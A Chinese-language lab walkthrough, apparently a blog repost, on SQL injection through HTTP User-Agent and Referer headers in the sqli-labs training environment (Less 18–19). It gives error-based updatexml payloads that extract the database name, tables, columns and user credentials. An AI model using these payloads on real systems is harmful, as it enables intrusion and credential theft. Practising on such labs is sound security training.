16、HTTP头注入(User-Agent、Referer)

环境sqli-labs

less 18

1、在UA处输入特殊字符,报错
16、HTTP头注入(User-Agent、Referer)_第1张图片
在这里插入图片描述
2、构造输入语句,获取数据库名称
or updatexml(1,concat(’##’,(database())),0))#
16、HTTP头注入(User-Agent、Referer)_第2张图片
在这里插入图片描述
3、获取表名
or updatexml(1,concat(’##’,(select group_concat(table_name) from information_schema.tables where table_schema=‘security’)),0))#
16、HTTP头注入(User-Agent、Referer)_第3张图片
在这里插入图片描述
4、获取字段
or updatexml(1,concat(’#’,(select group_concat(column_name) from information_schema.columns where table_schema=‘security’ and table_name=‘users’)),0))#
16、HTTP头注入(User-Agent、Referer)_第4张图片
在这里插入图片描述
5、获取字段内容
or updatexml(1,concat(’#’,(select * from (select concat_ws(’#’,id,username,password) from users limit 0,1) a)),0))#
16、HTTP头注入(User-Agent、Referer)_第5张图片
在这里插入图片描述

less 19

输入点在referer,注入语句同less 18

禁止非法,后果自负

欢迎关注公众号:web安全工具库
16、HTTP头注入(User-Agent、Referer)_第6张图片

你可能感兴趣的:(小课堂,HTTP头,头注入,User-Agent,Referer)